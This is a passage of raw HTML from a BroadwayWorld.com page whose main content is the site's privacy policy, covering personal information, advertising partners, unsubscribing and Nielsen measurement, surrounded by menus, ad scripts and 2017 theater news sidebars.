<div class=h-sub-menu-inner>
<ul>
<li><a href="/argentina/">ARGENTINA</a></li><li><a href="/brazil/">BRAZIL</a></li><li><a href="/colombia/regionalshows.cfm?ModPagespeed=off">COLOMBIA</a></li><li><a href="/venezuela/regionalshows.cfm?ModPagespeed=off">VENEZUELA</a></li> </ul>
</div>
</li>
<li class=dat-has-sub><a href="#">ASIA</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="http://china.broadwayworld.com">CHINA</a></li><li><a href="/india/">INDIA</a></li><li><a href="/indonesia/">INDONESIA</a></li><li><a href="/japan/">JAPAN</a></li><li><a href="/malaysia/regionalshows.cfm?ModPagespeed=off">MALAYSIA</a></li><li><a href="/philippines/">PHILIPPINES</a></li><li><a href="/singapore/">SINGAPORE</a></li><li><a href="/south-korea/regionalshows.cfm?ModPagespeed=off">SOUTH KOREA</a></li> </ul>
</div>
</li>
<li class=dat-has-sub><a href="#">AFRICA/MIDDLE EAST</a>
<div class=h-sub-menu-inner>
<ul>
<li><a href="/israel/">ISRAEL</a></li><li><a href="/russia/regionalshows.cfm?ModPagespeed=off">RUSSIA</a></li>
<li><a href="/south-africa/">SOUTH AFRICA</a></li><li><a href="/turkey/regionalshows.cfm?ModPagespeed=off">TURKEY</a></li>
</ul>
</div>
</li>
</ul>
</div>
</li>
<li class=dat-has-sub><a href="/aroundtheworld/">Entertainment</a>
<div class=h-sub-menu>
<ul>
<li><a href="/bwwtv/index.cfm">TV/MOVIES</a></li>
<li><a href="/cabaret/">CABARET</a></li>
<li><a href="/bwwmusic/index.cfm">MUSIC</a></li>
<li><a href="/bwwbooks/index.cfm">BOOKS</a></li>
<li><a href="/bwwclassical/index.cfm">CLASSICAL MUSIC</a></li>
<li><a href="/bwwdance/index.cfm">DANCE</a></li>
<li><a href="/bwwopera/index.cfm">OPERA</a></li>
<li><a href="/bwwfitness/index.cfm">FITNESS</a></li>
<li><a href="/food-wine/index.cfm">FOOD + WINE</a></li>
</ul>
</div>
</li>
</ul>
</div>
<!-- END #top-menu -->
</nav>
<!-- BEGIN .wrapper -->
<div class=wrapper>
<div class=header-panels>
<!-- BEGIN .header-logo -->
<div class=header-logo>
<a href="/">
<img class=image src="https://newimages.bwwstatic.com/2017/broadwayworld-new-nonretina-2.png" data-ot-retina="https://newimages.bwwstatic.com/2017/broadwayworld-new-retina.png" alt=BroadwayWorld style="height: 92px;max-width: 153px;"/>
</a>
<!-- END .header-logo -->
</div>
<!-- BEGIN .header-pob -->
<!-- BEGIN .header-pob -->
<div class=header-pob align=right>
<div class=ad-desktop>
<!-- 970 -->
<!-- sortable new970  size:970x90 -->
<!-- /106293300/NEW970 -->
<div id=div-gpt-ad-1479672818651-7 style='height:90px; width:970px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-7');});</script>
</div>
</div>
<div class=ad-tab>
<center>
<!-- sortable new728 nonresponsive  size:728x90 -->
<!-- /106293300/NEW728 -->
<div id=div-gpt-ad-1479672818651-6 style='height:90px; width:728px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-6');});</script>
</div>
</center>
</div>
<div class=ad-mob>
<center>
<!-- sortable new468  size:468x60 -->
<!-- /106293300/NEW468 -->
<div id=div-gpt-ad-1479672818651-5 style='height:60px; width:468px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-5');});</script>
</div>
</center>
</div>
<div class=ad-mob-sm>
<center>
<!-- sortable new320  size:320x50 -->
<!-- /106293300/NEW320 -->
<div id=div-gpt-ad-1479672818651-4 style='height:50px; width:320px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-4');});</script>
</div>
</center>
</div>
<!-- END .header-pob -->
</div>
</div>
<!-- END .wrapper -->
</div>
<!-- BEGIN #main-menu -->
<nav id=main-menu>
<a href="#dat-menu" class=dat-menu-button><i class="fa fa-bars"></i>Show Menu</a>
<div class=main-menu-placeholder style="background-color: #c31f2a;border-top:5px #343233;border-style: solid;height:40px;">
<!-- BEGIN .wrapper -->
<div class=wrapper>
<div class="search-nav right" style="margin-top:-10px; width: 280px;">
<div class=social-nav>
<a href="https://www.facebook.com/BroadwayWorld" target=_new><i class="fa fa-facebook"></i></a>
<a href="https://www.twitter.com/BroadwayWorld" target=_new><i class="fa fa-twitter"></i></a>
<a href="https://www.instagram.com/officialbroadwayworld/" target=_new><i class="fa fa-instagram"></i></a>
<a href="http://broadwayworld.tumblr.com/"><i class="fa fa-tumblr"></i></a>
<a href="/article/BroadwayWorld-is-Everywhere--Interact-with-Us-With-Apps-Social-Media-Today-20151106"><i class="fa fa-apple"></i></a>
</div>
<form action="/search/" id=cse-search-box onSubmit="if($F('search-text')=='Enter Search' || $F('search-text')=='') {alert('You must enter some search criteria'); return false;}">
<input type=text name=q autocomplete=off id=search-text results=0 value="" placeholder=Search style="font-family: 'Montserrat';"/><input type=hidden name=cx value=003281041504712504013:ma8kxnaa1hu /><input type=hidden name=cof value=FORID:11 /><input type=hidden name=ie value=UTF-8 /><input type=hidden class=radio name="search_type[]" id=all value=site checked />
<button type=submit style="float: right;"><i class="fa fa-search"></i></button>
</form>
</div>
<ul class=load-responsive rel="Main Menu">
<li><a href="#" data-ot-css="border-color: orange;" style="padding-top:10px;"><span style="padding-top:10px;">Sections</span></a>
<ul class=sub-menu>
<li><a href="/newsroom/">Latest News</a></li>
<li><a href="/aroundtheworld/">Around the World <b style="color:#b20223;">*NEW*</b></a> </li>
<li><a href="/bwidb/">BWW Database</a></li>
<li> <div id=div-gpt-ad-1479672818651-13 style='width:100px;height:30px;float:right;padding-right:4px;padding-top:4px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-13');});</script>
</div>
<a href="/cdsbooksdvds.cfm">CDs/Books/DVDs</a></li>
<li><div id=div-gpt-ad-1479672818651-14 style='width:100px;height:30px;float:right;padding-right:4px;padding-top:4px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-14');});</script>
</div><a href="/grosses.cfm">Grosses - <font color=green>Updated 11/12 </font>
</a></li>
<li><a href="/interviews.cfm">Interviews</a></li>
<li><a href="/gallerynew.cfm">Photos</a></li>
<li><a href="/topic/Podcasts">Podcasts</a></li>
<li><A href="/reviews.cfm">Reviews</A></li>
<li><a href="/tonyawards.cfm">Tony Awards</a>
</ul>
</li>
<li class=has-ot-mega-menu><a href="#"><span>Shows</span></a>
<ul class=ot-mega-menu>
<li>
<div class=widget-split>
<!-- BEGIN .widget -->
<div class=widget>
<ul class=menu style="padding-top:0px;">
<li><a href="/shows/shows.php?page=shows">Broadway Shows</a></li>
<li>
<a href="/shows/shows-musicals.php">Broadway Musicals</a>
</li>
<div style='background-color:white;height:35px;width:110px;'>
<!-- /106293300/TCPULLDOWN-MUSICALS -->
<div id=div-gpt-ad-1479672818651-15 style='height:30px; width:100px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-15');});</script>
</div>
</div>
<li>
<a href="/shows/shows-plays.php">Broadway Plays</a>
</li>
<div id=div-gpt-ad-1479672818651-16 style='width:100px;height:30px;float:right;padding-right:4px;padding-top:4px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-16');});</script>
</div>
<li><a href="/shows/shows.php?page=oshows">Off-Broadway</a></li>
<li><a href="/off-off-broadway/">Off-Off-Broadway</a></li>
<li><a href="/cabaret/">Cabarets/Concerts</a></li>
<li><a href="/pickashowregional.cfm?ModPagespeed=off">Search by Zip Code</a></li>
<li><a href="/stage-to-screen.cfm">Stage to Screen</a></li>
<li><a href="/shows/shows.php?page=tour">Tours</a></li>
<li><a href="/shows/shows.php?page=westend">West End</a></li>
</ul>
<!-- END .widget -->
</div>
</div>
<div class=widget-split>
<!-- BEGIN .widget -->
<div class=widget>
<h4>Hot Discounts</h4>
<div class="w-article-list w-article-list-small">
<div class=item>
<div class=item-header>
<a href="/special-broadway-offers.cfm">
<img src="https://newimages.bwwstatic.com/xbronx1024.jpg.pagespeed.ic.6t7H9pg-eI.jpg" alt="A Bronx Tale" data-ot-retina="" width=200 height=200>
</a>
</div>
<div class=item-content>
<h4><a href="/special-broadway-offers.cfm">A Bronx Tale</a>
</h4>
<span class=item-meta>
<a href="/special-broadway-offers.cfm" class=item-meta-i>Tix at $45</a>
</span>
</div>
</div>
<div class=item>
<div class=item-header>
<a href="/special-broadway-offers.cfm">
<img src="https://images.broadwayworld.com/chic200.jpg" alt=Chicago data-ot-retina="">
</a>
</div>
<div class=item-content>
<h4><a href="/special-broadway-offers.cfm">Chicago</a>
</h4>
<span class=item-meta>
<a href="/special-broadway-offers.cfm" class=item-meta-i>BoGo for $21!</a>
</span>
</div>
</div>
<div class=item>
<div class=item-header>
<a href="/special-broadway-offers.cfm">
<img src="https://newimages.bwwstatic.com/upload11/1668235/files/TATC_200x200.jpg" alt="Time and the Conways" data-ot-retina="" width=200 height=200>
</a>
</div>
<div class=item-content>
<h4><a href="/special-broadway-offers.cfm">Time and the Conways</a>
</h4>
<span class=item-meta>
<a href="/special-broadway-offers.cfm" class=item-meta-i>Save Up to $70</a>
</span>
</div>
</div>
<div class=item>
<div class=item-header>
<a href="/special-broadway-offers.cfm">
<img src="https://images.broadwayworld.com/ana200.jpg" alt=Anastasia data-ot-retina="">
</a>
</div>
<div class=item-content>
<h4><a href="/special-broadway-offers.cfm">Anastasia</a>
</h4>
<span class=item-meta>
<a href="/special-broadway-offers.cfm" class=item-meta-i>Tix at $69</a>
</span>
</div>
</div>
</div>
<a href="/special-broadway-offers.cfm" class=widget-view-more>View More Discounts</a>
<!-- END .widget -->
</div>
</div>
</li>
</ul>
</li>
<li><a href="#"><span>Chat Boards</span></a>
<ul class=sub-menu>
<li><a href="/board/">Broadway</a><li>
<li>
<a href="/westend/board/">West End</a></li>
<li><a href="/board/index.php?boardname=off">Off-Topic</a>
</li>
<li><a href="/board/index.php?boardname=student">Students</a></li>
</ul>
</li>
<li><a href="#"><span>Jobs</span></a>
<ul class=sub-menu>
<li><a href="/equity.cfm">Equity</a></li>
<li><a href="/nonequity.cfm">Non Equity</a></li>
<li><a href="/classifieds/">Classifieds</a></li>
</ul>
</li>
<li><a href="#"><span>Students</span></a>
<ul class=sub-menu>
<li><a href="/bwwjr.cfm">BWW Junior</a></li>
<li><a href="/studentcenter.cfm">College Center</a></li>
<li><a href="/studentcalendar-elementary.cfm">Elementary Center</a></li>
<li><a href="/studentcalendarhighschool.cfm">High School Center</a></li>
<li><a href="/topic/COLLEGE-CENTER">Student Blogs</a></li>	</ul>
</li>
<li><a href="#"><span>Video</span></a>
<ul class=sub-menu>
<li><a href="/tvmainnew.cfm">BroadwayWorld TV</a></li>
<li><a href="/tvmainnew.cfm?type=show">Broadway Show Previews</a></li>
<li><a href="/topic/BACKSTAGE-WITH-RICHARD-RIDGE">Backstage w/ Richie Ridge</a></li>
<li><a href="/tvmainnew.cfm?type=stagetube">Stage Tube</a></li>
<li><a href="/author/TV-Red-Carpets">Red Carpets</a></li>
<li><a href="/author/TV-Opening-Night-Special">Opening Nights</a></li>
<li><a href="/author/TV-Press-Previews">Press Previews</a></li>
</ul>
<li><a href="#"><span><font style="background-color: #2a3a73;
    height: 15px;
    max-height: 17px;
    padding: 9px;color: white;">Industry Insider</font></span></a>
<ul class=sub-menu>
<li>
<li><a href="/industry/">Industry Home Presented By:</a> <center>
<div id=div-gpt-ad-1479672818651-IndustrySponsor style='height:60px; width:200px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-IndustrySponsor');});</script>
</div>
</center>
</li>
<li><a href="/topic/Industry-Insight-Cara-Joy-David">Industry Insight by Cara Joy David</a></li>
<li><a href="/industry-social.cfm">Social Analytics</a></li>
<li><a href="/grosses.cfm">Grosses</a></li>
<li><a href="/industry-bww-stats.cfm">Broadway Leader Board</a></li>
<li><a href="/topic/Industry-Podcast-The-OHenry-Report">Podcast - The OHenry Report</a></li>
<li><a href="/industry-bww-theatres.cfm">Theater Report</a></li>
<li><a href="/industry-bww-regionals.cfm">What's Playing Around the World</a></li>
<li><a href="/industry/article/How-to-Add-and-Modify-Profiles-and-Productions-in-BroadwayWorlds-Database-20170807">Update BWW's Database</a></li>
</ul>
<!-- END .widget --> </li>
<!-- END .wrapper -->
</div>
</div>
<!-- END #main-menu -->
</nav>
<!-- END #header -->
</div>
<div id=content>
<!-- BEGIN .wrapper -->
<div class=wrapper>
<!-- BEGIN .portus-main-content-panel -->
<div class="paragraph-row portus-main-content-panel">
<div class=column12>
<div class=portus-main-content-s-block>
<!-- BEGIN .portus-main-content -->
<div class=portus-main-content>
<div class=theiaStickySidebar>
<div class=portus-main-article-block>
<table width=100% cellpadding=5 cellspacing=5><tr><td>
<strong><center><h1 class=header>BroadwayWorld.com Privacy Policy<br></h1></strong>
<p></center>
<font face=verdana size=-1>
BroadwayWorld.com ** DOES NOT DISCLOSE YOUR PERSONAL INFORMATION** to outside parties. We only release account and other personal information when we believe release is appropriate to comply with law; enforce or apply our <a href="https://www.broadwayworld.com/board/guide.cfm">Terms and Conditions of Use</a> and other agreements; or protect the rights, property, or safety of BroadwayWorld.com, our users, or others. This includes exchanging information with other companies and organizations for fraud protection.
<br><Br>Periodically, aggregate statistics will be provided to our advertising partners, but *NO* specfic or personal information will be included. We do ask you if you are interested in receiving relevant information or offers from theater vendors via e-mail. You may choose to receive this information or easily "unsubscribe" and choose NOT TO RECEIVE any e-mails from BroadwayWorld.com outside your newsletter subscriptions.
<br><Br>If you choose to receive additional information other than your newsletters, this information is sent to you directly by BroadwayWorld.com. If you choose not to receive other information from us, this WILL NOT AFFECT your regular subscriptions. If you choose to discontinue your newsletter subscriptions, you may also do this by simply unsubscribing at any time during your subscription period. When you send us your "unsubscribe" request to each of our offerings, YOUR RECORD GETS PERMANENTLY REMOVED from these databases as we receive your remove requests.
<br><Br>We use third-party advertising companies to serve ads when you visit our Web site. These companies may use aggregated information (not including your name, address, email address or telephone number) about your visits to this and other Web sites in order to provide advertisements about goods and services of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, <a href="http://www.networkadvertising.org/managing/opt_out.asp">click here</a>.
<br><Br>
Our properties may feature Nielsen proprietary measurement software, which will allow you to contribute to market research, such as Nielsen TV Ratings. To learn more about the information that Nielsen software may collect and your choices with regard to it, please see the Nielsen Digital Measurement Privacy Policy at <a href="http://www.nielsen.com/digitalprivacy">http://www.nielsen.com/digitalprivacy</a>.
<br><Br>
Thank you for making BroadwayWorld.com the web's premier theater resource and please let us know how we can serve you better!
</center>
</center>
</font>
</td></tr></table>
</div></div></div>
<aside class="sidebar portus-sidebar-small">
<div class=theiaStickySidebar>
<!-- BEGIN .widget -->
<div class=widget>
<h3 style="margin-bottom:-4px;">Hot Stories</h3>
<div class=w-article-list style="margin-top:1px;">
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="/article/Stop-the-World-Broadways-COME-FROM-AWAY-Being-Adapted-for-the-Big-Screen-20171115"><img src="https://images.bwwstatic.com/columnpic10/1708BC72379-CB9D-F3DF-475762BA4B0BD746.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/3408BC72379-CB9D-F3DF-475762BA4B0BD746.jpg" alt="Stop the World! Broadway's COME FROM AWAY to Be Adapted for the Big Screen!" width=180 height=74 /></a>
<h4 class=hot><a href="/article/Stop-the-World-Broadways-COME-FROM-AWAY-Being-Adapted-for-the-Big-Screen-20171115">Stop the World! Broadway's COME FROM AWAY to Be Adapted for the Big Screen!</a></h4>
</div>
</div>
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="/article/Breaking-CHARLIE-AND-THE-CHOCOLATE-FACTORY-Will-Close-Up-Shop-National-Tour-Will-Launch-in-Fall-2018-20171115"><img src="https://images.bwwstatic.com/columnpic10/170866E9BC9-EE03-0B5D-A7E03F07A304D021.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/340866E9BC9-EE03-0B5D-A7E03F07A304D021.jpg" alt="Breaking: CHARLIE AND THE CHOCOLATE FACTORY Will Close Up Shop; Tour Will Launch in Fall 2018" width=180 height=74 /></a>
<h4 class=hot><a href="/article/Breaking-CHARLIE-AND-THE-CHOCOLATE-FACTORY-Will-Close-Up-Shop-National-Tour-Will-Launch-in-Fall-2018-20171115">Breaking: CHARLIE AND THE CHOCOLATE FACTORY Will Close Up Shop; Tour Will Launch in Fall 2018</a></h4>
</div>
</div>
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="/article/Photo-Exclusive-First-Look-at-LaChanze-Ariana-DeBose-and-Storm-Lever-in-New-Donna-Summer-Musical-at-La-Jolla-Playhouse-20171115"><img src="https://images.bwwstatic.com/columnpic10/1708E11345E-0874-2632-46DB2E638CDB29A5.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/3408E11345E-0874-2632-46DB2E638CDB29A5.jpg" alt="Photo Exclusive: LaChanze, DeBose & Lever in New Donna Summer Musical" width=180 height=74 /></a>
<h4 class=hot><a href="/article/Photo-Exclusive-First-Look-at-LaChanze-Ariana-DeBose-and-Storm-Lever-in-New-Donna-Summer-Musical-at-La-Jolla-Playhouse-20171115">Photo Exclusive: LaChanze, DeBose & Lever in New Donna Summer Musical</a></h4>
</div>
</div>
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="/article/Breaking-Todrick-Will-Razzle-Dazzle-Em-in-CHICAGO-on-Broadway-20171116"><img src="https://images.bwwstatic.com/columnpic10/x170BB41838E-B7F6-B662-AAF8CCA65F0DE3BB.jpg.pagespeed.ic.oL0Z-i6dYI.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/340BB41838E-B7F6-B662-AAF8CCA65F0DE3BB.jpg" alt="Breaking: Todrick Hall Will Razzle Dazzle 'Em in CHICAGO on Broadway" width=180 height=74 /></a>
<h4 class=hot><a href="/article/Breaking-Todrick-Will-Razzle-Dazzle-Em-in-CHICAGO-on-Broadway-20171116">Breaking: Todrick Hall Will Razzle Dazzle 'Em in CHICAGO on Broadway</a></h4>
</div>
</div>
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="/article/COME-FROM-AWAY-FALSETTOS-and-THE-PLAY-THAT-GOES-WRONG-Join-the-Ahmansons-2018-19-Lineup-20171115"><img src="https://images.bwwstatic.com/columnpic10/17084E8DE2C-AE78-5088-0D7E906C469BB19E.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/34084E8DE2C-AE78-5088-0D7E906C469BB19E.jpg" alt="COME FROM AWAY, FALSETTOS Join the Ahmanson's 2018-19 Lineup" width=180 height=74 /></a>
<h4 class=hot><a href="/article/COME-FROM-AWAY-FALSETTOS-and-THE-PLAY-THAT-GOES-WRONG-Join-the-Ahmansons-2018-19-Lineup-20171115">COME FROM AWAY, FALSETTOS Join the Ahmanson's 2018-19 Lineup</a></h4>
</div>
</div>
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="/article/BWW-TV-Head-the-the-Highlands-with-Highlights-of-Kelli-OHara-Patrick-Wilson-More-in-BRIGADOON-20171115"><img src="https://images.bwwstatic.com/columnpic10/17081FE7C83-EC13-CF62-ABDFC050604F4B26.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/34081FE7C83-EC13-CF62-ABDFC050604F4B26.jpg" alt="TV: Head to the Highlands with Highlights of Kelli O'Hara, Patrick Wilson & More in BRIGADOON!" width=180 height=74 /></a>
<h4 class=hot><a href="/article/BWW-TV-Head-the-the-Highlands-with-Highlights-of-Kelli-OHara-Patrick-Wilson-More-in-BRIGADOON-20171115">TV: Head to the Highlands with Highlights of Kelli O'Hara, Patrick Wilson & More in BRIGADOON!</a></h4>
</div>
</div>
<div class=item>
<div class=item-content onMouseOver="this.style.backgroundColor='#d4d4d4'" onMouseOut="this.style.backgroundColor='#f8f8f8'">
<a href="https://www.broadwayworld.com/article/BWW-Morning-Brief-November-17th-2017-HOME-FOR-THE-HOLIDAYS-and-More-20171117"><img src="https://images.bwwstatic.com/columnpic10/x170CDBE3F4E-9AAE-8D25-C3995591BAC796A4.jpg.pagespeed.ic.eU37DnDgox.jpg" data-ot-retina="https://images.bwwstatic.com/columnpic10/340CDBE3F4E-9AAE-8D25-C3995591BAC796A4.jpg" alt="Morning Brief - HOME FOR THE HOLIDAYS and More!" width=180 height=74 /></a>
<h4 class=hot><a href="https://www.broadwayworld.com/article/BWW-Morning-Brief-November-17th-2017-HOME-FOR-THE-HOLIDAYS-and-More-20171117">Morning Brief - HOME FOR THE HOLIDAYS and More!</a></h4>
</div>
</div>
</div>
<!-- END .widget -->
</div>
<!-- BEGIN .widget -->
<div class=widget>
<div class=do-space><Center>
<!-- sortable new160  size:160x600 -->
<script>var width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth;if(width>=1150){document.write('<div id="div-gpt-ad-1479672818651-160" style="width:160px; height:600px;">');googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-160');});document.write('</div>');}</script>
</Center>	</Center>	</div>
<!-- END .widget -->
</div>
</div>
</aside>
<aside class="sidebar portus-sidebar-large">
<div class=theiaStickySidebar>
<!-- BEGIN .widget -->
<div class=widget style="width:300px;">
<h3>BroadwayWorld TV</h3>
<div style="align-content: center;" align=center>
<i class="fa fa-play-circle-o" style="font-size:30pt;position: absolute;
    top: 90px;
        opacity: 0.5;
color: white;
    right:5px;
    z-index: 10000;
    height: 100px;"></i>
<ul id=demo1>
<li><a href="/article/VIDEO-Andrew-Lloyd-Webber-Chats-UNMASKED-and-Names-His-Favorite-Show-Tune-of-All-Time-20171118"><img src="https://images.bwwstatic.com/columnpic10/x3402C7356F4-D463-29B4-225971C37DAAF10A.jpg.pagespeed.ic.GK7EmM3ldr.jpg" alt="" width=400 height=165>ALW Chats UNMASKED and Names His Favorite Show Tune</a>
</li>
<li><a href="/article/VIDEO-Take-in-the-View-The-Playbillies-and-Special-Guest-Garrett-Long-Perform-DEAR-EVAN-HANSENs-For-Forever-20171118"><img src="https://images.bwwstatic.com/columnpic10/x340203848BA-CAEF-FFDD-5A21A7A9E16C6BA1.jpg.pagespeed.ic.L4w5Uy7XF9.jpg" alt="" width=400 height=165>The Playbillies & Garrett Long Perform EVAN HANSEN's 'For Forever'</a>
</li>
<li><a href="/article/VIDEO-Blooper-Alert-Outtakes-from-Lin-Manuel-Miranda-and-Vanessa-Nadals-Prizeo-Video-Shoot-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340FDA668DB-069A-BFC0-BA3F3BA73F04AC60.jpg.pagespeed.ic.6_-M5Dj7Bt.jpg" alt="" width=400 height=165>Blooper Alert! Outtakes from Lin-Manuel Miranda & Vanessa Nadal's Prizeo Video Shoot</a>
</li>
<li><a href="/article/VIDEO-Lin-Manuel-Miranda-Goes-Head-to-Head-in-History-Trivia-with-an-Elementary-Schooler-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340FCAAE44F-97B6-3653-8F689D723E163617.jpg.pagespeed.ic.2nXFllSrQt.jpg" alt="" width=400 height=165>Lin-Manuel Miranda Goes Head to Head in History Trivia with an Elementary Schooler!</a>
</li>
<li><a href="/article/VIDEO-On-This-Day-November-17--A-GENTLEMANS-GUIDE-TO-LOVE-AND-MURDER-Brings-Murder-and-Mayhem-to-Broadway-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340F7AD9145-EA82-02E8-456BCA6AAE132182.jpg.pagespeed.ic.vRPNPAcWbb.jpg" alt="" width=400 height=165>On This Day, November 17- GENTLEMAN'S GUIDE Brings Murder and Mayhem to Broadway</a>
</li>
<li><a href="/article/First-Listen-Zac-Efron-Zendaya-Sing-New-Track-from-THE-GREATEST-SHOWMAN-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340F3A2AC1B-98D7-A51C-58200C6BEC7BCA43.jpg.pagespeed.ic.Ne1M6-IPF7.jpg" alt="" width=400 height=165>First Listen: Zac Efron & Zendaya Sing New Track from THE GREATEST SHOWMAN</a>
</li>
<li><a href="/article/BWW-TV-Exclusive-CATS-Jessica-Hendy-and-Christine-Cornish-Smith-Pour-a-Purrfect-Drink-on-BROADWAY-BARTENDER-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340F34BA270-FF2B-54BA-153CB7FEC2E577BC.jpg.pagespeed.ic.u-X7Sxcsd5.jpg" alt="" width=400 height=165>Exclusive: CATS' Stars Pour a Purrfect Drink on BROADWAY BARTENDER</a>
</li>
<li><a href="/article/BWW-TV-Jeremy-Jordan-Performs-Original-MenkenSlater-Song-in-TANGLED-THE-SERIES-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340F1BB4249-E5E6-FA2D-EC3AC62E31E78124.jpg.pagespeed.ic.8q2_ObZBmu.jpg" alt="" width=400 height=165> Jeremy Jordan Lends Voice in TANGLED: THE SERIES</a>
</li>
<li><a href="/article/VIDEO-Take-a-Closer-Look-at-Broadways-HELLO-DOLLY-Vinyl-Edition-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340F15CEA83-E3AC-3036-10E485B39CFFD359.jpg.pagespeed.ic.vsL7TpA2Ag.jpg" alt="" width=400 height=165>Take a Closer Look at Broadway's HELLO, DOLLY! Vinyl Edition</a>
</li>
<li><a href="/article/BWW-TV-Exclusive-Watch-AnaIsabelle-and-More-in-Highlights-from-EVITA-at-Asolo-Rep-20171117"><img src="https://images.bwwstatic.com/columnpic10/x340F0D50EAB-BA52-65D0-39D13A1EE5F1ED66.jpg.pagespeed.ic.M2N2DUkSV3.jpg" alt="" width=400 height=165> Exclusive: Watch Highlights from EVITA at Asolo Rep</a>
</li>
</ul>
<script>jQuery(document).ready(function(){var demo1=$("#demo1").slippry({});});</script>
</div>
<!-- /106293300/BWW300Main -->
<center>
<!-- sortable new300A  size:300x250 -->
<div id=div-gpt-ad-1479672818651-0 style='width:300px;overflow:hidden;position:relative;padding-top:6px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-0');});</script>
</div>
</center>
<h3 style="margin-top:10px;">Ticket Central <small style="float:right;padding-top:3px;"><a href="/shows/shows.php?page=shows" style="color: white;">Browse All Shows</a></small></h3>
<!-- BEGIN .panel -->
<table border=0 style="padding:0px;width:100%;"><tr><td valign=top style="padding-right:8px;padding-left:0px;margin-left:0px;">
<div id=div-gpt-ad-1479672818651-10 style='height:135px; width:130px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-10');});</script>
</div>
</td>
<td style="padding-top:0px;margin-top:0px;vertical-align:middle;">
<li class=special><a href="/special-broadway-offers.cfm">A BRONX TALE</a></li>
<li class=special><a href="/special-broadway-offers.cfm">TIME AND THE CONWAYS</a></li>
<li class=special><a href="/special-broadway-offers.cfm">THE LAST MATCH</a></li>
<li class=special><a href="/special-broadway-offers.cfm">CHICAGO</a></li>
<li class=special><a href="/special-broadway-offers.cfm">ANASTASIA</a></li>
</td></tr></table>
<!-- BEGIN .widget -->
<div class=widget style="border-bottom: none; ">
<h3 style="margin-top:10px;">Watch Now on BWW TV <small style="float:right;padding-top:4px;"><a href="https://www.broadwayworld.com/tvmainnew.cfm" style="color: white;">More</a></small></h3>
<div class=widget-instagram-photos style="height: 135px;">
<div class=item>
<div class=item-header>
<a href="/article/VIDEO-First-Look-Barbra-Streisand-Performs-Pure-Imagination-from-Upcoming-Netflix-Special-20171117">
<img src="https://images.bwwstatic.com/columnpic10/170E74123F4-99DE-5936-3CA475E461F0E3D6.jpg" alt="Streisand Performs 'Pure Imagination' from Netflix Special" width=180 height=74>
</a>
</div>
<div class=item-content style="height:60px;">
<h4><a href="/article/VIDEO-First-Look-Barbra-Streisand-Performs-Pure-Imagination-from-Upcoming-Netflix-Special-20171117">Streisand Performs 'Pure Imagination' from Netflix Special</a></h4>
</div>
</div>
<div class=item>
<div class=item-header>
<a href="/article/VIDEO-Who-Will-Have-to-Wait-to-Be-King-Saturday-Night-Live-Shares-Screen-Tests-of-THE-LION-KING-Hopefuls-20171112">
<img src="https://images.bwwstatic.com/columnpic10/170E7CD664D-964F-9ADF-24A77019B9F5A55A.jpg" alt="Who Has to Wait to Be King? SNL Shares Screen Tests of LION KING Hopefuls" width=180 height=74>
</a>
</div>
<div class=item-content style="height:60px;">
<h4><a href="/article/VIDEO-Who-Will-Have-to-Wait-to-Be-King-Saturday-Night-Live-Shares-Screen-Tests-of-THE-LION-KING-Hopefuls-20171112">Who Has to Wait to Be King? SNL Shares Screen Tests of LION KING Hopefuls</a></h4>
</div>
</div>
<div class=item>
<div class=item-header>
<a href="/article/BWW-TV-Head-the-the-Highlands-with-Highlights-of-Kelli-OHara-Patrick-Wilson-More-in-BRIGADOON-20171115">
<img src="https://images.bwwstatic.com/columnpic10/17081FE7C83-EC13-CF62-ABDFC050604F4B26.jpg" alt="TV: Head to the Highlands with Highlights of Kelli O'Hara, Patrick Wilson & More in BRIGADOON!" width=180 height=74>
</a>
</div>
<div class=item-content style="height:60px;">
<h4><a href="/article/BWW-TV-Head-the-the-Highlands-with-Highlights-of-Kelli-OHara-Patrick-Wilson-More-in-BRIGADOON-20171115">TV: Head to the Highlands with Highlights of Kelli O'Hara, Patrick Wilson & More in BRIGADOON!</a></h4>
</div>
</div>
<div class=item>
<div class=item-header>
